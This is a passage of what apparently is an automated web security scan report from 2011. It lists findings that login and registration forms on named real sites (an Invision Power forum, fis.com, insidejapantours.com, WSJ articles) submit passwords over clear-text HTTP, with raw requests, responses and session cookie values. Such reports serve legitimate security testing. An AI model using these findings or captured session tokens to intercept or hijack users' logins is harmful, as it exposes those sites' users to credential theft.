Cookie: cforums_session_id=8d464692f5305d92adc7b346c33d132b; cforums_itemMarking_forums_items=eJxLtDK0qs60MjY2sDQ3tM60MjSyNDOzMDU1NrGuBVwwaHIHAw%2C%2C; cforums_modpids=deleted; __utmz=161164207.1296685568.1.1.utmcsr=invisionpower.com|utmccn=(referral)|utmcmd=referral|utmcct=/products/board/; __utma=161164207.2019448737.1296685568.1296685568.1296685568.1; __utmc=161164207; __utmb=161164207.1.10.1296685568;

Response

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 00:08:26 GMT
Server: Apache/2.2.17 (Unix) mod_ssl/2.2.17 OpenSSL/0.9.8e-fips-rhel5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 PHP/5.2.14
X-Powered-By: PHP/5.2.14
Set-Cookie: cforums_session_id=52c21975d801317348f94128ddfa4737; path=/; domain=community.invisionpower.com; httponly
Cache-Control: no-cache,must-revalidate, max-age=0
Expires: Wed, 02 Feb 2011 00:08:27 GMT
Pragma: no-cache
Set-Cookie: cforums_itemMarking_forums_items=eJxLtDK0qs60MjY2sDQ3tM60MjSyNDOzMDU1NrGuBVwwaHIHAw%2C%2C; expires=Fri, 03-Feb-2012 00:08:27 GMT; path=/; domain=community.invisionpower.com
Set-Cookie: cforums_itemMarking_ccs_items=eJxLtDK0qs60MrSwBhJGlmZmlobmBubWtVwwUCEGNA%2C%2C; expires=Fri, 03-Feb-2012 00:08:27 GMT; path=/; domain=community.invisionpower.com
Connection: close
Content-Type: text/html;charset=ISO-8859-1
Content-Length: 33840

<!DOCTYPE html
    PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
    "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xml:lang="en" lang="en" xmlns="http://www.w3.org/1999/xhtml">
   <hea
...[SNIP]...
<div id='member_block' class='logged_out'>
   
       <form action='http://community.invisionpower.com/index.php?app=core&module=global&section=login&do=process' method='post'>
           <input type='hidden' name='return' value='http://community.invisionpower.com/resources/documentation/index.html/_/documentation/getting-started/upgrading-r18' />
...[SNIP]...
<input type="text" class='input_text' size="20" name="username" id='welcome-username' onfocus="clearField('welcome-username');" value="Username or email" />
           <input type='password' class='input_text' size='20' name='password' id='welcome-password' onfocus="clearField('welcome-password');" value='Username or email' />
           <input type='submit' class='input_submit' value='Sign In' />
...[SNIP]...

4.6. http://community.invisionpower.com/resources/documentation/index.html/_/knowledge-base/recurring-non-version-specific-issues/encoded-files-with-zend-guard-r536  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://community.invisionpower.com
Path:   /resources/documentation/index.html/_/knowledge-base/recurring-non-version-specific-issues/encoded-files-with-zend-guard-r536

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:The form contains the following password field:

Request

GET /resources/documentation/index.html/_/knowledge-base/recurring-non-version-specific-issues/encoded-files-with-zend-guard-r536 HTTP/1.1
Host: community.invisionpower.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: cforums_session_id=8d464692f5305d92adc7b346c33d132b; cforums_itemMarking_forums_items=eJxLtDK0qs60MjY2sDQ3tM60MjSyNDOzMDU1NrGuBVwwaHIHAw%2C%2C; cforums_modpids=deleted; __utmz=161164207.1296685568.1.1.utmcsr=invisionpower.com|utmccn=(referral)|utmcmd=referral|utmcct=/products/board/; __utma=161164207.2019448737.1296685568.1296685568.1296685568.1; __utmc=161164207; __utmb=161164207.1.10.1296685568;

Response

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 00:08:25 GMT
Server: Apache/2.2.17 (Unix) mod_ssl/2.2.17 OpenSSL/0.9.8e-fips-rhel5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 PHP/5.2.14
X-Powered-By: PHP/5.2.14
Set-Cookie: cforums_session_id=7e18e83c9fce99cef40adc0b7151471b; path=/; domain=community.invisionpower.com; httponly
Cache-Control: no-cache,must-revalidate, max-age=0
Expires: Wed, 02 Feb 2011 00:08:26 GMT
Pragma: no-cache
Set-Cookie: cforums_itemMarking_forums_items=eJxLtDK0qs60MjY2sDQ3tM60MjSyNDOzMDU1NrGuBVwwaHIHAw%2C%2C; expires=Fri, 03-Feb-2012 00:08:26 GMT; path=/; domain=community.invisionpower.com
Set-Cookie: cforums_itemMarking_ccs_items=eJxLtDK0qs60MjU2s860MjSyNDOzNDQ3MLOuBVwwVf8GaA%2C%2C; expires=Fri, 03-Feb-2012 00:08:26 GMT; path=/; domain=community.invisionpower.com
Connection: close
Content-Type: text/html;charset=ISO-8859-1
Content-Length: 30617

<!DOCTYPE html
    PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
    "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xml:lang="en" lang="en" xmlns="http://www.w3.org/1999/xhtml">
   <hea
...[SNIP]...
<div id='member_block' class='logged_out'>
   
       <form action='http://community.invisionpower.com/index.php?app=core&module=global&section=login&do=process' method='post'>
           <input type='hidden' name='return' value='http://community.invisionpower.com/resources/documentation/index.html/_/knowledge-base/recurring-non-version-specific-issues/encoded-files-with-zend-guard
...[SNIP]...
<input type="text" class='input_text' size="20" name="username" id='welcome-username' onfocus="clearField('welcome-username');" value="Username or email" />
           <input type='password' class='input_text' size='20' name='password' id='welcome-password' onfocus="clearField('welcome-password');" value='Username or email' />
           <input type='submit' class='input_submit' value='Sign In' />
...[SNIP]...

4.7. http://fis.com/fis/worldnews/worldnews.asp  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://fis.com
Path:   /fis/worldnews/worldnews.asp

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:The form contains the following password field:

Request

GET /fis/worldnews/worldnews.asp HTTP/1.1
Host: fis.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/5.0
Date: Thu, 03 Feb 2011 00:54:33 GMT
Connection: close
Content-Length: 83533
Content-Type: text/html
Set-Cookie: ASPSESSIONIDCASTCAST=LKGBFPGBNACCBLIDDPHBHANM; path=/
Cache-control: private


<html>
<head>
   <meta http-equiv="content-type" content="text/html; charset=UTF-8">
   <meta http-equiv="refresh" content="1800">
   <title>FIS - Worldnews - Icelandic Group still up for grabs</title
...[SNIP]...
<!-- LOGIN -->
   <form name="member_login">
       
           <tr>
...[SNIP]...
<td>
                                           <input style="font-size: 9px; font-family: verdana; height: 15px" onFocus="this.select()" type="password" size="8" name="password" onkeyPress="checkEnter(event)">
                                       </td>
...[SNIP]...

4.8. http://insidejapantours.com/japan-news/1671/tuna-costs-254-000-in-japan/  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://insidejapantours.com
Path:   /japan-news/1671/tuna-costs-254-000-in-japan/

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:The form contains the following password field:

Request

GET /japan-news/1671/tuna-costs-254-000-in-japan/ HTTP/1.1
Host: insidejapantours.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=ISO-8859-1
Set-Cookie: CSPSESSIONID-SP-80=00000001000039bv9MU3000000HVqGoe$mkIhY9X0_5aueuw--; path=/;
CACHE-CONTROL: no-cache
CONNECTION: Close
DATE: Thu, 03 Feb 2011 01:02:54 GMT
EXPIRES: Thu, 29 Oct 1998 17:04:19 GMT
PRAGMA: no-cache

<!DOCTYPE html PUBLIC "-//W3C//DTD Xhtml 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
<link rel="alternate" type="application/rss+xml" title="Japan
...[SNIP]...
<div class="pad5"><form method="post" action="/csp/jap/insidejapan/loginok.csp">


<input type="hidden" name="FormPage" value="login">
...[SNIP]...
<td><input class="smalltxt" name="password" type="password" size="10"></td>
...[SNIP]...

4.9. http://ipboard-software.software.informer.com/  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ipboard-software.software.informer.com
Path:   /

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:The form contains the following password field:

Request

GET / HTTP/1.1
Host: ipboard-software.software.informer.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Thu, 03 Feb 2011 01:02:55 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.14
Set-Cookie: PHPSESSID=kvc2qv4jlhknajb7ks0pmmn6m3; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Length: 17619

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
   <head>
       <meta http-equiv="Con
...[SNIP]...
<div>
       <form accept-charset="utf-8" action="/login.php" method="post" id="register">
               <div class="hidden">
...[SNIP]...
</p>
       <input type="password" name="passwd" />
       <p>
...[SNIP]...

4.10. http://online.wsj.com/article/SB10001424052748703779704576073610615364334.html  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://online.wsj.com
Path:   /article/SB10001424052748703779704576073610615364334.html

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:The form contains the following password fields:

Request

GET /article/SB10001424052748703779704576073610615364334.html HTTP/1.1
Host: online.wsj.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 01:04:22 GMT
Server: Apache/2.0.58 (Unix)
Set-Cookie: djcs_route=2c5be191-dbef-49ce-b161-dd9949a1fa00; domain=.wsj.com; path=/; Expires=Sat Jan 30 20:04:22 2021; max-age=315360000
Set-Cookie: DJSESSION=ORCS%3dna%2cus; path=/; domain=.wsj.com
Set-Cookie: DJCOOKIE=ORC%3dna%2cus; path=/; domain=.wsj.com; expires=Fri, 03-Feb-2012 01:04:22 GMT
Set-Cookie: wsjregion=na%2cus; path=/; domain=.wsj.com
FastDynaPage-ServerInfo: sbkj2kapachep04 - Wed 02/02/11 - 16:54:45 EST
Cache-Control: max-age=15
Expires: Thu, 03 Feb 2011 01:04:37 GMT
Vary: Accept-Encoding
P3P: CP=CAO DSP COR CURa ADMa DEVi TAIo PSAa PSDa IVDi CONi OTPi OUR OTRi BUS PHY ONL UNI PUR COM NAV INT DEM CNT STA OTC
Keep-Alive: timeout=2, max=30
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8
Content-Length: 183840

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
</div>

<form name="freeRegistration_form" id="freeRegistration_form" action="" method="post" accept-charset="utf-8" onsubmit="return false;">
<ul class="regForms">
...[SNIP]...
</label>
<input type="password" name="passwordReg" value="" id="passwordReg" maxlength='15' class="text" />
</div>
...[SNIP]...
</label>

<input type="password" name="passwordConfirmationReg" value="" id="passwordConfirmationReg" maxlength='15' class="text" />
</div>
...[SNIP]...

4.11. http://online.wsj.com/article/SB10001424052748703779704576073610615364334.html  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://online.wsj.com
Path:   /article/SB10001424052748703779704576073610615364334.html

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:The form contains the following password field:

Request

GET /article/SB10001424052748703779704576073610615364334.html HTTP/1.1
Host: online.wsj.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 01:04:22 GMT
Server: Apache/2.0.58 (Unix)
Set-Cookie: djcs_route=2c5be191-dbef-49ce-b161-dd9949a1fa00; domain=.wsj.com; path=/; Expires=Sat Jan 30 20:04:22 2021; max-age=315360000
Set-Cookie: DJSESSION=ORCS%3dna%2cus; path=/; domain=.wsj.com
Set-Cookie: DJCOOKIE=ORC%3dna%2cus; path=/; domain=.wsj.com; expires=Fri, 03-Feb-2012 01:04:22 GMT
Set-Cookie: wsjregion=na%2cus; path=/; domain=.wsj.com
FastDynaPage-ServerInfo: sbkj2kapachep04 - Wed 02/02/11 - 16:54:45 EST
Cache-Control: max-age=15
Expires: Thu, 03 Feb 2011 01:04:37 GMT
Vary: Accept-Encoding
P3P: CP=CAO DSP COR CURa ADMa DEVi TAIo PSAa PSDa IVDi CONi OTPi OUR OTRi BUS PHY ONL UNI PUR COM NAV INT DEM CNT STA OTC
Keep-Alive: timeout=2, max=30
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8
Content-Length: 183840

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
</h4>

<form action="http://commerce.wsj.com/auth/submitlogin" id="login_form" name="login_form" method="post" onsubmit="suppress_popup=true;return true;">
<fieldset>
...[SNIP]...
</label>
<input type="password" name="password" id="login_password" class="login_pswd" tabindex="2" value="" maxlength="30"/>
<input type="hidden" name="url" id="page_url" value=""/>
...[SNIP]...

4.12. http://online.wsj.com/article/SB10001424052748703956604576110453371369740.html  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://online.wsj.com
Path:   /article/SB10001424052748703956604576110453371369740.html

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:The form contains the following password fields:

Request

GET /article/SB10001424052748703956604576110453371369740.html HTTP/1.1
Host: online.wsj.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 01:04:24 GMT
Server: Apache/2.0.58 (Unix)
Set-Cookie: djcs_route=dc538be4-28ab-4562-9b58-129c8fc82f54; domain=.wsj.com; path=/; Expires=Sat Jan 30 20:04:24 2021; max-age=315360000
Set-Cookie: DJSESSION=ORCS%3dna%2cus; path=/; domain=.wsj.com
Set-Cookie: DJCOOKIE=ORC%3dna%2cus; path=/; domain=.wsj.com; expires=Fri, 03-Feb-2012 01:04:24 GMT
Set-Cookie: wsjregion=na%2cus; path=/; domain=.wsj.com
FastDynaPage-ServerInfo: sbkj2kapachep08 - Wed 02/02/11 - 15:46:44 EST
Cache-Control: max-age=15
Expires: Thu, 03 Feb 2011 01:04:39 GMT
Vary: Accept-Encoding
P3P: CP=CAO DSP COR CURa ADMa DEVi TAIo PSAa PSDa IVDi CONi OTPi OUR OTRi BUS PHY ONL UNI PUR COM NAV INT DEM CNT STA OTC
Keep-Alive: timeout=2, max=32
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8
Content-Length: 199594

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
</div>

<form name="freeRegistration_form" id="freeRegistration_form" action="" method="post" accept-charset="utf-8" onsubmit="return false;">
<ul class="regForms">
...[SNIP]...
</label>
<input type="password" name="passwordReg" value="" id="passwordReg" maxlength='15' class="text" />
</div>
...[SNIP]...
</label>

<input type="password" name="passwordConfirmationReg" value="" id="passwordConfirmationReg" maxlength='15' class="text" />
</div>
...[SNIP]...

4.13. http://online.wsj.com/article/SB10001424052748703956604576110453371369740.html  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://online.wsj.com
Path:   /article/SB10001424052748703956604576110453371369740.html

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:The form contains the following password field:

Request

GET /article/SB10001424052748703956604576110453371369740.html HTTP/1.1
Host: online.wsj.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (c